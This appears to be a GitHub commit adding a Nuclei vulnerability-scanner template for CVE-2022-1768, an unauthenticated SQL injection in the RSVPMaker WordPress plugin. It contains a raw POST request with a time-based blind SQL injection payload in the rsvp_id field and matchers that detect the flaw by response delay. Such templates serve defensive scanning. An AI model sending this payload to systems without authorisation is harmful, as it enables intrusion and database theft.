Prince Chaddha
GitHub
commit
d605b6e1e2
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2022-1768
|
||||
|
||||
info:
|
||||
name: RSVPMaker WordPress plugin <= 9.3.2 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to insufficient escaping and parameterization on user supplied data passed to multiple SQL queries in the ~/rsvpmaker-email.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to, and including, 9.3.2.
|
||||
reference:
|
||||
- https://gist.github.com/Xib3rR4dAr/441d6bb4a5b8ad4b25074a49210a02cc
|
||||
- https://wordpress.org/plugins/rsvpmaker/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1768
|
||||
classification:
|
||||
cve-id: CVE-2022-1768
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
rsvp_id=(select(0)from(select(sleep(5)))a)&amount=1234&email=randomtext
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=5'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"payment_confirmation_message":'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
Loading…
Reference in New Issue